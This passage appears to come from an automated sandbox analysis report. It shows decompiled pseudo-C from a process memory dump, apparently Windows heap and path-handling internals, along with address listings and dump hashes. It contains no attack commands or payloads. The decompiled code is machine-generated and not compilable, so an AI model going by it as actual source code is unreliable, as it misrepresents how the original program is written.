0; *(_t528 - 0x74) = 0; *(_t528 - 0x9c) = 0; *(_t528 - 0x84) = 0; *(_t528 - 0xac) = 0; *(_t528 - 0x88) = 0; *(_t528 - 0xa8) = 0; *((intOrPtr*)(_t434 + 0x40)) = 0; if( *(_t528 + 0x1c) <= 0x80) { __eflags = *(__ecx + 0xc0) & 0x00000004; if(__eflags != 0) { _t421 = E01184C56(0, __edx, __ecx, __eflags); __eflags = _t421; if(_t421 != 0) { *((intOrPtr*)(_t528 - 4)) = 0; E010FD000(0x410); *(_t528 - 0x18) = _t529; *(_t528 - 0x9c) = _t529; *((intOrPtr*)(_t528 - 4)) = 0xfffffffe; E01185542(_t528 - 0x9c, _t528 - 0x84); } } _t435 = _t427; *(_t528 - 0xd0) = _t435; _t474 = _t511 + 0x65; *((intOrPtr*)(_t528 - 0x94)) = _t474; _t511 = 0x18; while(1) { *(_t528 - 0xa0) = _t427; *(_t528 - 0xbc) = _t427; *(_t528 - 0x80) = _t427; *(_t528 - 0x78) = 0x50; *(_t528 - 0x79) = _t427; *(_t528 - 0x7a) = _t427; *(_t528 - 0x8c) = _t427; *(_t528 - 0x98) = _t427; *(_t528 - 0x90) = _t427; *(_t528 - 0xb0) = _t427; *(_t528 - 0xb8) = _t427; _t296 = 1 << _t435; _t436 = *(_t528 + 0xc) & 0x0000ffff; __eflags = _t436 & _t296; if((_t436 & _t296) != 0) { goto L92; } __eflags = *((char*)(_t474 - 1)); if( *((char*)(_t474 - 1)) == 0) { goto L92; } _t301 = *_t474; __eflags = _t494[1] - _t301; if(_t494[1] <= _t301) { L10: __eflags = *(_t474 - 5) & 0x00000040; if(( *(_t474 - 5) & 0x00000040) == 0) { L12: __eflags = *(_t474 - 0xd) & _t494[2] | *(_t474 - 9) & _t494[3]; if(( *(_t474 - 0xd) & _t494[2] | *(_t474 - 9) & _t494[3]) == 0) { goto L92; } _t442 = *(_t474 - 0x11) & _t494[3]; __eflags = ( *(_t474 - 0x15) & _t494[2]) - *(_t474 - 0x15); if(( *(_t474 - 0x15) & _t494[2]) != *(_t474 - 0x15)) { goto L92; } __eflags = _t442 - *(_t474 - 0x11); if(_t442 != *(_t474 - 0x11)) { goto L92; } L15: _t306 = *(_t474 + 1) & 0x000000ff; *(_t528 - 0xc0) = _t306; *(_t528 - 0xa4) = _t306; __eflags = *0x11a60e8; if( *0x11a60e8 != 0) { __eflags = _t306 - 0x40; if(_t306 < 0x40) { L20: asm("lock inc dword [eax]"); _t310 = *0x11a60e8; // 0x0 _t311 = *(_t310 + *(_t528 - 0xa4) * 8); __eflags = _t311 & 0x00000001; if((_t311 & 0x00000001) == 0) { *(_t528 - 0xa0) = _t311; _t475 = _t427; *(_t528 - 0x74) = _t427; __eflags = _t475; if(_t475 != 0) { L91: _t474 = *((intOrPtr*)(_t528 - 0x94)); goto L92; } asm("sbb edi, edi"); _t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50; _t511 = _t498; _t312 = *((intOrPtr*)(_t528 - 0x94)); __eflags = *(_t312 - 5) & 1; if(( *(_t312 - 5) & 1) != 0) { _push(_t528 - 0x98); _push(0x4c); _push(_t528 - 0x70); _push(1); _push(0xfffffffa); _t412 = E010F9710(); _t475 = _t427; __eflags = _t412; if(_t412 >= 0) { _t414 = *(_t528 - 0x98) - 8; *(_t528 - 0x98) = _t414; _t416 = _t414 + 0x0000000f & 0x0000fff8; *(_t528 - 0x8c) = _t416; *(_t528 - 0x79) = 1; _t511 = (_t416 & 0x0000ffff) + _t498; __eflags = _t511; } } _t446 = *( *((intOrPtr*)(_t528 - 0x94)) - 5); __eflags = _t446 & 0x00000004; if((_t446 & 0x00000004) != 0) { __eflags = *(_t528 - 0x9c); if( *(_t528 - 0x9c) != 0) { *(_t528 - 0x7a) = 1; _t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff); __eflags = _t511; } } _t313 = 2; _t447 = _t446 & _t313; __eflags = _t447; *(_t528 - 0xd4) = _t447; if(_t447 != 0) { _t406 = 0x10; _t511 = _t511 + _t406; __eflags = _t511; } _t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) + *((intOrPtr*)(_t528 - 0xc4)); *(_t528 - 0x88) = _t427; __eflags = *(_t528 + 0x1c); if( *(_t528 + 0x1c) <= 0) { L45: __eflags = *(_t528 - 0xb0); if( *(_t528 - 0xb0) != 0) { _t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8); __eflags = _t511; } __eflags = _t475; if(_t475 != 0) { asm("lock dec dword [ecx+edx*8+0x4]"); goto L100; } else { _t494[3] = _t511; _t451 = *(_t528 - 0xa0); _t427 = E010F6DE6(_t451, _t511, *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc); *(_t528 - 0x88) = _t427; __eflags = _t427; if(_t427 == 0) { __eflags = _t511 - 0xfff8; if(_t511 <= 0xfff8) { __eflags = *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511; asm("sbb ecx, ecx"); __eflags = (_t451 & 0x000000e2) + 8; } asm("lock dec dword [eax+edx*8+0x4]"); L100: goto L101; } _t453 = *(_t528 - 0xa0); *_t494 = _t453; _t494[1] = _t427; _t494[2] = *(_t528 - 0xbc); *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) = *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1; *_t427 = *(_t453 + 0x24) | _t511; *(_t427 + 4) = *((intOrPtr*)(_t528 + 0x10)); *((short*)(_t427 + 6)) = *((intOrPtr*)(_t528 + 8)); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); __eflags = *(_t528 + 0x14); if( *(_t528 + 0x14) == 0) { __eflags = *[fs:0x18] + 0xf50; } asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); __eflags = *(_t528 + 0x18); if( *(_t528 + 0x18) == 0) { _t454 = *(_t528 - 0x80); _t479 = *(_t528 - 0x78); _t327 = 1; __eflags = 1; } else { _t146 = _t427 + 0x50; // 0x50 _t454 = _t146; *(_t528 - 0x80) = _t454; _t382 = 0x18; *_t454 = _t382; *((short*)(_t454 + 2)) = 1; _t385 = 0x10; *((short*)(_t454 + 6)) = _t385; *(_t454 + 4) = 0; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t327 = 1; *(_t427 + 4) = *(_t427 + 4) | 1; _t479 = 0x68; *(_t528 - 0x78) = _t479; } __eflags = *(_t528 - 0x79) - _t327; if( *(_t528 - 0x79) == _t327) { _t524 = _t479 + _t427; _t508 = *(_t528 - 0x8c); *_t524 = _t508; _t373 = 2; *((short*)(_t524 + 2)) = _t373; *((short*)(_t524 + 6)) = *(_t528 - 0x98); *((short*)(_t524 + 4)) = 0; _t167 = _t524 + 8; // 0x8 E010FF3E0(_t167, _t528 - 0x68, *(_t528 - 0x98)); _t529 = _t529 + 0xc; *(_t427 + 4) = *(_t427 + 4) | 1; _t479 = *(_t528 - 0x78) + (_t508 & 0x0000ffff); *(_t528 - 0x78) = _t479; _t380 = *(_t528 - 0x80); __eflags = _t380; if(_t380 != 0) { _t173 = _t380 + 4; *_t173 = *(_t380 + 4) | 1; __eflags = *_t173; } _t454 = _t524; *(_t528 - 0x80) = _t454; _t327 = 1; __eflags = 1; } __eflags = *(_t528 - 0xd4); if( *(_t528 - 0xd4) == 0) { _t505 = *(_t528 - 0x80); } else { _t505 = _t479 + _t427; _t523 = 0x10; *_t505 = _t523; _t367 = 3; *((short*)(_t505 + 2)) = _t367; _t368 = 4; *((short*)(_t505 + 6)) = _t368; *(_t505 + 4) = 0; *((intOrPtr*)(_t505 + 8)) = *((intOrPtr*)( *[fs:0x30] + 0x1d4)); _t327 = 1; *(_t427 + 4) = *(_t427 + 4) | 1; _t479 = _t479 + _t523; *(_t528 - 0x78) = _t479; __eflags = _t454; if(_t454 != 0) { _t186 = _t454 + 4; *_t186 = *(_t454 + 4) | 1; __eflags = *_t186; } *(_t528 - 0x80) = _t505; } __eflags = *(_t528 - 0x7a) - _t327; if( *(_t528 - 0x7a) == _t327) { *(_t528 - 0xd4) = _t479 + _t427; _t522 = *(_t528 - 0x84) & 0x0000ffff; E010FF3E0(_t479 + _t427, *(_t528 - 0x9c), _t522); _t529 = _t529 + 0xc; *(_t427 + 4) = *(_t427 + 4) | 1; _t479 = *(_t528 - 0x78) + _t522; *(_t528 - 0x78) = _t479; __eflags = _t505; if(_t505 != 0) { _t199 = _t505 + 4; *_t199 = *(_t505 + 4) | 1; __eflags = *_t199; } _t505 = *(_t528 - 0xd4); *(_t528 - 0x80) = _t505; } __eflags = *(_t528 - 0xa8); if( *(_t528 - 0xa8) != 0) { _t356 = _t479 + _t427; *(_t528 - 0xd4) = _t356; _t462 = *(_t528 - 0xac); *_t356 = _t462 + 0x0000000f & 0x0000fff8; _t485 = 0xc; *((short*)(_t356 + 2)) = _t485; *(_t356 + 6) = _t462; *((short*)(_t356 + 4)) = 0; _t211 = _t356 + 8; // 0x9 E010FF3E0(_t211, *(_t528 - 0xa8), _t462 & 0x0000ffff); E010FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) - *(_t528 - 0xac) - 0x00000008 & 0x0000ffff); _t529 = _t529 + 0x18; _t427 = *(_t528 - 0x88); *(_t427 + 4) = *(_t427 + 4) | 1; _t505 = *(_t528 - 0xd4); _t479 = *(_t528 - 0x78) + ( *_t505 & 0x0000ffff); *(_t528 - 0x78) = _t479; _t362 = *(_t528 - 0x80); __eflags = _t362; if(_t362 != 0) { _t222 = _t362 + 4; *_t222 = *(_t362 + 4) | 1; __eflags = *_t222; } } __eflags = *(_t528 - 0xb0); if( *(_t528 - 0xb0) != 0) { *(_t479 + _t427) = *(_t528 - 0x90) + 0x0000000f & 0x0000fff8; _t458 = 0xb; *((short*)(_t479 + _t427 + 2)) = _t458; *((short*)(_t479 + _t427 + 6)) = *(_t528 - 0x90); *((short*)(_t427 + 4 + _t479)) = 0; *(_t528 - 0xb8) = _t479 + 8 + _t427; E010FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) - *(_t528 - 0x90) - 0x00000008 & 0x0000ffff); _t529 = _t529 + 0xc; *(_t427 + 4) = *(_t427 + 4) | 1; _t479 = *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff); *(_t528 - 0x78) = _t479; __eflags = _t505; if(_t505 != 0) { _t241 = _t505 + 4; *_t241 = *(_t505 + 4) | 1; __eflags = *_t241; } } _t328 = *(_t528 + 0x1c); __eflags = _t328; if(_t328 == 0) { L87: _t329 = *((intOrPtr*)(_t528 - 0xe0)); *((intOrPtr*)(_t427 + 0x10)) = _t329; _t455 = *(_t528 - 0xdc); *(_t427 + 0x14) = _t455; _t480 = *(_t528 - 0xa0); _t517 = 3; __eflags = *((intOrPtr*)(_t480 + 0x10)) - _t517; if( *((intOrPtr*)(_t480 + 0x10)) != _t517) { asm("rdtsc"); *(_t427 + 0x3c) = _t480; } else { *(_t427 + 0x3c) = _t455; } *((intOrPtr*)(_t427 + 0x38)) = _t329; _t456 = *[fs:0x18]; *((intOrPtr*)(_t427 + 8)) = *((intOrPtr*)(_t456 + 0x24)); *((intOrPtr*)(_t427 + 0xc)) = *((intOrPtr*)(_t456 + 0x20)); _t427 = 0; __eflags = 0; _t511 = 0x18; goto L91; } else { _t519 = *((intOrPtr*)(_t528 - 0xc8)) + 0xc; __eflags = _t519; *(_t528 - 0x8c) = _t328; do { _t506 = *((intOrPtr*)(_t519 - 4)); _t457 = *((intOrPtr*)(_t519 - 0xc)); *(_t528 - 0xd4) = *(_t519 - 8); _t333 = *((intOrPtr*)(_t528 - 0xb4)); __eflags = *(_t333 + 0x36) & 0x00004000; if(( *(_t333 + 0x36) & 0x00004000) != 0) { _t334 = *_t519; } else { _t334 = 0; } _t336 = _t334 & 0x000000ff; __eflags = _t336; _t427 = *(_t528 - 0x88); if(_t336 == 0) { _t481 = _t479 + _t506; __eflags = _t481; *(_t528 - 0x78) = _t481; E010FF3E0(_t479 + _t427, _t457, _t506); _t529 = _t529 + 0xc; } else { _t340 = _t336 - 1; __eflags = _t340; if(_t340 == 0) { E010FF3E0( *(_t528 - 0xb8), _t457, _t506); _t529 = _t529 + 0xc; *(_t528 - 0xb8) = *(_t528 - 0xb8) + _t506; } else { __eflags = _t340 == 0; if(_t340 == 0) { __eflags = _t506 - 8; if(_t506 == 8) { *((intOrPtr*)(_t528 - 0xe0)) = *_t457; *(_t528 - 0xdc) = *(_t457 + 4); } } } } _t339 = 0x10; _t519 = _t519 + _t339; _t263 = _t528 - 0x8c; *_t263 = *(_t528 - 0x8c) - 1; __eflags = *_t263; _t479 = *(_t528 - 0x78); } while ( *_t263 != 0); goto L87; } } } else { _t392 = *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000; *(_t528 - 0xa2) = _t392; _t469 = *((intOrPtr*)(_t528 - 0xc8)) + 8; __eflags = _t469; while(1) { *(_t528 - 0xe4) = _t511; __eflags = _t392; _t393 = _t427; if(_t392 != 0) { _t393 = *((intOrPtr*)(_t469 + 4)); } _t395 = (_t393 & 0x000000ff) - _t427; __eflags = _t395; if(_t395 == 0) { _t511 = _t511 + *_t469; __eflags = _t511; } else { _t398 = _t395 - 1; __eflags = _t398; if(_t398 == 0) { *(_t528 - 0x90) = *(_t528 - 0x90) + *_t469; *(_t528 - 0xb0) = *(_t528 - 0xb0) + 1; } else { __eflags = _t398 == 1; if(_t398 == 1) { *(_t528 - 0xa8) = *(_t469 - 8); _t402 = *_t469 & 0x0000ffff; *(_t528 - 0xac) = _t402; _t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8); } } } __eflags = _t511 - *(_t528 - 0xe4); if(_t511 < *(_t528 - 0xe4)) { break; } _t397 = *(_t528 - 0x88) + 1; *(_t528 - 0x88) = _t397; _t469 = _t469 + 0x10; __eflags = _t397 - *(_t528 + 0x1c); _t392 = *(_t528 - 0xa2); if(_t397 < *(_t528 + 0x1c)) { continue; } goto L45; } _t475 = 0x216; *(_t528 - 0x74) = 0x216; goto L45; } } else { asm("lock dec dword [eax+ecx*8+0x4]"); goto L16; } } _t491 = E01184CAB(_t306, _t528 - 0xa4); *(_t528 - 0x74) = _t491; __eflags = _t491; if(_t491 != 0) { goto L91; } else { _t474 = *((intOrPtr*)(_t528 - 0x94)); goto L20; } } L16: *(_t528 - 0x74) = 0x1069; L93: _t298 = *(_t528 - 0xd0) + 1; *(_t528 - 0xd0) = _t298; _t474 = _t474 + _t511; *((intOrPtr*)(_t528 - 0x94)) = _t474; _t494 = 4; __eflags = _t298 - _t494; if(_t298 >= _t494) { goto L100; } _t494 = *(_t528 - 0xcc); _t435 = _t298; continue; } __eflags = _t494[2] | _t494[3]; if((_t494[2] | _t494[3]) == 0) { goto L15; } goto L12; } __eflags = _t301; if(_t301 != 0) { goto L92; } goto L10; L92: goto L93; } } else { _push(0x57); L101: return E0110D130(_t427, _t494, _t511); } } 0x01185ba5 0x01185baa 0x01185baf 0x01185bb4 0x01185bb6 0x01185bbc 0x01185bbe 0x01185bc4 0x01185bcd 0x01185bd3 0x01185bd6 0x01185bdc 0x01185be0 0x01185be3 0x01185beb 0x01185bf2 0x01185bf8 0x01185bfe 0x01185c04 0x01185c0e 0x01185c18 0x01185c1f 0x01185c25 0x01185c2a 0x01185c2c 0x01185c32 0x01185c3a 0x01185c3f 0x01185c42 0x01185c48 0x01185c5b 0x01185c5b 0x01185c2c 0x01185cb7 0x01185cb9 0x01185cbf 0x01185cc2 0x01185cca 0x01185ccb 0x01185ccb 0x01185cd1 0x01185cd7 0x01185cda 0x01185ce1 0x01185ce4 0x01185ce7 0x01185ced 0x01185cf3 0x01185cf9 0x01185cff 0x01185d08 0x01185d0a 0x01185d0e 0x01185d10 0x00000000 0x00000000 0x01185d16 0x01185d1a 0x00000000 0x00000000 0x01185d20 0x01185d22 0x01185d25 0x01185d2f 0x01185d2f 0x01185d33 0x01185d3d 0x01185d49 0x01185d4b 0x00000000 0x00000000 0x01185d5a 0x01185d5d 0x01185d60 0x00000000 0x00000000 0x01185d66 0x01185d69 0x00000000 0x00000000 0x01185d6f 0x01185d6f 0x01185d73 0x01185d79 0x01185d7f 0x01185d86 0x01185d95 0x01185d98 0x01185dba 0x01185dcb 0x01185dce 0x01185dd3 0x01185dd6 0x01185dd8 0x01185de6 0x01185dec 0x01185dee 0x01185df1 0x01185df3 0x0118635a 0x0118635a 0x00000000 0x0118635a 0x01185dfe 0x01185e02 0x01185e05 0x01185e07 0x01185e10 0x01185e13 0x01185e1b 0x01185e1c 0x01185e21 0x01185e22 0x01185e23 0x01185e25 0x01185e2a 0x01185e2c 0x01185e2e 0x01185e36 0x01185e39 0x01185e42 0x01185e47 0x01185e4d 0x01185e54 0x01185e54 0x01185e54 0x01185e2e 0x01185e5c 0x01185e5f 0x01185e62 0x01185e64 0x01185e6b 0x01185e70 0x01185e7a 0x01185e7a 0x01185e7a 0x01185e6b 0x01185e7e 0x01185e7f 0x01185e7f 0x01185e81 0x01185e87 0x01185e8b 0x01185e8c 0x01185e8c 0x01185e8c 0x01185e9a 0x01185e9c 0x01185ea2 0x01185ea6 0x01185f50 0x01185f50 0x01185f57 0x01185f66 0x01185f66 0x01185f66 0x01185f68 0x01185f6a 0x011863d0 0x00000000 0x01185f70 0x01185f70 0x01185f91 0x01185f9c 0x01185f9e 0x01185fa4 0x01185fa6 0x0118638c 0x01186392 0x011863a1 0x011863a7 0x011863af 0x011863af 0x011863bd 0x011863d8 0x00000000 0x011863d8 0x01185fac 0x01185fb2 0x01185fb4 0x01185fbd 0x01185fc6 0x01185fce 0x01185fd4 0x01185fdc 0x01185fec 0x01185fed 0x01185fee 0x01185fef 0x01185ff9 0x01185ffa 0x01185ffb 0x01185ffc 0x01186000 0x01186004 0x01186012 0x01186012 0x01186018 0x01186019 0x0118601a 0x0118601b 0x0118601c 0x01186020 0x01186059 0x0118605c 0x01186061 0x01186061 0x01186022 0x01186022 0x01186022 0x01186025 0x0118602a 0x0118602b 0x01186031 0x01186037 0x01186038 0x0118603e 0x01186048 0x01186049 0x0118604a 0x0118604b 0x0118604c 0x0118604d 0x01186053 0x01186054 0x01186054 0x01186062 0x01186065 0x01186067 0x0118606a 0x01186070 0x01186075 0x01186076 0x01186081 0x01186087 0x01186095 0x01186099 0x0118609e 0x011860a4 0x011860ae 0x011860b0 0x011860b3 0x011860b6 0x011860b8 0x011860ba 0x011860ba 0x011860ba 0x011860ba 0x011860be 0x011860c0 0x011860c5 0x011860c5 0x011860c5 0x011860c6 0x011860cd 0x01186114 0x011860cf 0x011860cf 0x011860d4 0x011860d5 0x011860da 0x011860db 0x011860e1 0x011860e2 0x011860e8 0x011860f8 0x011860fd 0x011860fe 0x01186102 0x01186104 0x01186107 0x01186109 0x0118610b 0x0118610b 0x0118610b 0x0118610b 0x0118610f 0x0118610f 0x01186117 0x0118611a 0x0118611f 0x01186125 0x01186134 0x01186139 0x0118613f 0x01186146 0x01186148 0x0118614b 0x0118614d 0x0118614f 0x0118614f 0x0118614f 0x0118614f 0x01186153 0x01186159 0x01186159 0x0118615c 0x01186163 0x01186169 0x0118616c 0x01186172 0x01186181 0x01186186 0x01186187 0x0118618b 0x01186191 0x01186195 0x011861a3 0x011861bb 0x011861c0 0x011861c3 0x011861cc 0x011861d0 0x011861dc 0x011861de 0x011861e1 0x011861e4 0x011861e6 0x011861e8 0x011861e8 0x011861e8 0x011861e8 0x011861e6 0x011861ec 0x011861f3 0x01186203 0x01186209 0x0118620a 0x01186216 0x0118621d 0x01186227 0x01186241 0x01186246 0x0118624c 0x01186257 0x01186259 0x0118625c 0x0118625e 0x01186260 0x01186260 0x01186260 0x01186260 0x0118625e 0x01186264 0x01186267 0x01186269 0x01186315 0x01186315 0x0118631b 0x0118631e 0x01186324 0x01186327 0x0118632f 0x01186330 0x01186333 0x0118633a 0x0118633c 0x01186335 0x01186335 0x01186335 0x0118633f 0x01186342 0x0118634c 0x01186352 0x01186355 0x01186355 0x01186359 0x00000000 0x0118626f 0x01186275 0x01186275 0x01186278 0x0118627e 0x0118627e 0x01186281 0x01186287 0x0118628d 0x01186298 0x0118629c 0x011862a2 0x0118629e 0x0118629e 0x0118629e 0x011862a7 0x011862a7 0x011862aa 0x011862b0 0x011862f0 0x011862f0 0x011862f2 0x011862f8 0x011862fd 0x011862b2 0x011862b2 0x011862b2 0x011862b5 0x011862dd 0x011862e2 0x011862e5 0x011862b7 0x011862b8 0x011862bb 0x011862bd 0x011862c0 0x011862c4 0x011862cd 0x011862cd 0x011862c0 0x011862bb 0x011862b5 0x01186302 0x01186303 0x01186305 0x01186305 0x01186305 0x0118630c 0x0118630c 0x00000000 0x0118627e 0x01186269 0x01185eac 0x01185ebb 0x01185ebe 0x01185ecb 0x01185ecb 0x01185ece 0x01185ece 0x01185ed4 0x01185ed7 0x01185ed9 0x01185edb 0x01185edb 0x01185ee1 0x01185ee1 0x01185ee3 0x01185f20 0x01185f20 0x01185ee5 0x01185ee5 0x01185ee5 0x01185ee8 0x01185f11 0x01185f18 0x01185eea 0x01185eea 0x01185eed 0x01185ef2 0x01185ef8 0x01185efb 0x01185f0a 0x01185f0a 0x01185eed 0x01185ee8 0x01185f22 0x01185f28 0x00000000 0x00000000 0x01185f30 0x01185f31 0x01185f37 0x01185f3a 0x01185f3d 0x01185f44 0x00000000 0x00000000 0x00000000 0x01185f46 0x01185f48 0x01185f4d 0x00000000 0x01185f4d 0x01185dda 0x01185ddf 0x00000000 0x01185ddf 0x01185dd8 0x01185da7 0x01185da9 0x01185dac 0x01185dae 0x00000000 0x01185db4 0x01185db4 0x00000000 0x01185db4 0x01185dae 0x01185d88 0x01185d8d 0x01186363 0x01186369 0x0118636a 0x01186370 0x01186372 0x0118637a 0x0118637b 0x0118637d 0x00000000 0x00000000 0x0118637f 0x01186385 0x00000000 0x01186385 0x01185d38 0x01185d3b 0x00000000 0x00000000 0x00000000 0x01185d3b 0x01185d27 0x01185d29 0x00000000 0x00000000 0x00000000 0x01186360 0x00000000 0x01186360 0x01185c10 0x01185c10 0x011863da 0x011863e5 0x011863e5

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 9af4243f74ee141870300324d14fd7d3d378550d18c0cae74e66ab3348bc197a Instruction ID: 1202e4e524f774d81cfa1bfeedc8cb448aad6441264b14c87682147ef6c94ed3 Opcode Fuzzy Hash: 9af4243f74ee141870300324d14fd7d3d378550d18c0cae74e66ab3348bc197a Instruction Fuzzy Hash: FF425A75900229CFDB68DF68C880BA9BBB1FF49304F15C1AAD94DEB242E7349985CF51

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%

E010D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) { signed int _v8; void* _v20; signed int _v24; char _v532; char _v540; signed short _v544; signed int _v548; signed short* _v552; signed short _v556; signed short* _v560; signed short* _v564; signed short* _v568; void* _v570; signed short* _v572; signed short _v576; signed int _v580; char _v581; void* _v584; unsigned int _v588; signed short* _v592; void* _v597; void* _v600; void* _v604; void* _v609; void* _v616; void* __ebx; void* __edi; void* __esi; char _t161; signed int _t162; unsigned int _t163; void* _t169; signed short _t173; signed short _t177; signed short _t181; unsigned int _t182; signed int _t185; signed int _t213; signed int _t225; short _t233; signed char _t234; signed int _t242; signed int _t243; signed int _t244; signed int _t245; signed int _t250; void* _t251; signed short* _t254; void* _t255; signed int _t256; void* _t257; signed short* _t260; signed short _t265; signed short* _t269; signed short _t271; signed short** _t272; signed short* _t275; signed short _t282; signed short _t283; signed short _t290; signed short _t299; signed short _t307; signed int _t308; signed short _t311; signed short* _t315; signed short _t316; void* _t317; void* _t319; signed short* _t321; void* _t322; void* _t323; unsigned int _t324; signed int _t325; void* _t326; signed int _t327; signed int _t329; _t329 = (_t327 & 0xfffffff8) - 0x24c; _v8 = *0x11ad360 ^ _t329; _t157 = _a8; _t321 = _a4; _t315 = __edx; _v548 = __ecx; _t305 = _a20; _v560 = _a12; _t260 = _a16; _v564 = __edx; _v580 = _a8; _v572 = _t260; _v544 = _a20; if( *__edx <= 8) { L3: if(_t260 != 0) { *_t260 = 0; } _t254 = &_v532; _v588 = 0x208; if((_v548 & 0x00000001) != 0) { _v556 = *_t315; _v552 = _t315[2]; _t161 = E010EF232( &_v556); _t316 = _v556; _v540 = _t161; goto L17; } else { _t306 = 0x208; _t298 = _t315; _t316 = E010D6E30(_t315, 0x208, _t254, _t260, &_v581, &_v540); if(_t316 == 0) { L68: _t322 = 0xc0000033; goto L39; } else { while(_v581 == 0) { _t233 = _v588; if(_t316 > _t233) { _t234 = _v548; if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 && *((char*)( *[fs:0x30] + 3)) < 0) { _t254 = L010D4620(_t298, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316); if(_t254 == 0) { _t169 = 0xc0000017; } else { _t298 = _v564; _v588 = _t316; _t306 = _t316; _t316 = E010D6E30(_v564, _t316, _t254, _v572, &_v581, &_v540); if(_t316 != 0) { continue; } else { goto L68; } } } else { goto L90; } } else { _v556 = _t316; *((short*)(_t329 + 0x32)) = _t233; _v552 = _t254; if(_t316 < 2) { L11: if(_t316 < 4 || *_t254 == 0 || _t254[1] != 0x3a) { _t161 = 5; } else { if(_t316 < 6) { L87: _t161 = 3; } else { _t242 = _t254[2] & 0x0000ffff; if(_t242 != 0x5c) { if(_t242 == 0x2f) { goto L16; } else { goto L87; } goto L101; } else { L16: _t161 = 2; } } } } else { _t243 = *_t254 & 0x0000ffff; if(_t243 == 0x5c || _t243 == 0x2f) { if(_t316 < 4) { L81: _t161 = 4; goto L17; } else { _t244 = _t254[1] & 0x0000ffff; if(_t244 != 0x5c) { if(_t244 == 0x2f) { goto L60; } else { goto L81; } } else { L60: if(_t316 < 6) { L83: _t161 = 1; goto L17; } else { _t245 = _t254[2] & 0x0000ffff; if(_t245 != 0x2e) { if(_t245 == 0x3f) { goto L62; } else { goto L83; } } else { L62: if(_t316 < 8) { L85: _t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1; goto L17; } else { _t250 = _t254[3] & 0x0000ffff; if(_t250 != 0x5c) { if(_t250 == 0x2f) { goto L64; } else { goto L85; } } else { L64: _t161 = 6; goto L17; } } } } } } goto L101; } else { goto L11; } } L17: if(_t161 != 2) { _t162 = _t161 - 1; if(_t162 > 5) { goto L18; } else { switch( *((intOrPtr*)(_t162 * 4 + &M010D45F8))) { case 0: _v568 = 0x1091078; __eax = 2; goto L20; case 1: goto L18; case 2: _t163 = 4; goto L19; } } goto L41; } else { L18: _t163 = 0; L19: _v568 = 0x10911c4; } L20: _v588 = _t163; _v564 = _t163 + _t163; _t306 = *_v568 & 0x0000ffff; _t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff); _v576 = _t265; if(_t265 > 0xfffe) { L90: _t322 = 0xc0000106; } else { if(_t321 != 0) { if(_t265 > (_t321[1] & 0x0000ffff)) { if(_v580 != 0) { goto L23; } else { _t322 = 0xc0000106; goto L39; } } else { _t177 = _t306; goto L25; } goto L101; } else { if(_v580 == _t321) { _t322 = 0xc000000d; } else { L23: _t173 = L010D4620(_t265, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265); _t269 = _v592; _t269[2] = _t173; if(_t173 == 0) { _t322 = 0xc0000017; } else { _t316 = _v556; *_t269 = 0; _t321 = _t269; _t269[1] = _v576; _t177 = *_v568 & 0x0000ffff; L25: _v580 = _t177; if(_t177 == 0) { L29: _t307 = *_t321 & 0x0000ffff; } else { _t290 = *_t321 & 0x0000ffff; _v576 = _t290; _t310 = _t177 & 0x0000ffff; if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) { _t307 = *_t321 & 0xffff; } else { _v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2; E010FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310); _t329 = _t329 + 0xc; _t311 = _v580; _t225 = *_t321 + _t311 & 0x0000ffff; *_t321 = _t225; if(_t225 + 1 < (_t321[1] & 0x0000ffff)) { *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0; } goto L29; } } _t271 = _v556 - _v588 + _v588; _v580 = _t307; _v576 = _t271; if(_t271 != 0) { _t308 = _t271 & 0x0000ffff; _v588 = _t308; if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) { _v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2; E010FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308); _t329 = _t329 + 0xc; _t213 = *_t321 + _v576 & 0x0000ffff; *_t321 = _t213; if(_t213 + 1 < (_t321[1] & 0x0000ffff)) { *((short*)(_v580 + (_v588 >> 1) * 2)) = 0; } } } _t272 = _v560; if(_t272 != 0) { *_t272 = _t321; } _t306 = 0; *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0; _t275 = _v572; if(_t275 != 0) { _t306 = *_t275; if(_t306 != 0) { *_t275 = ( 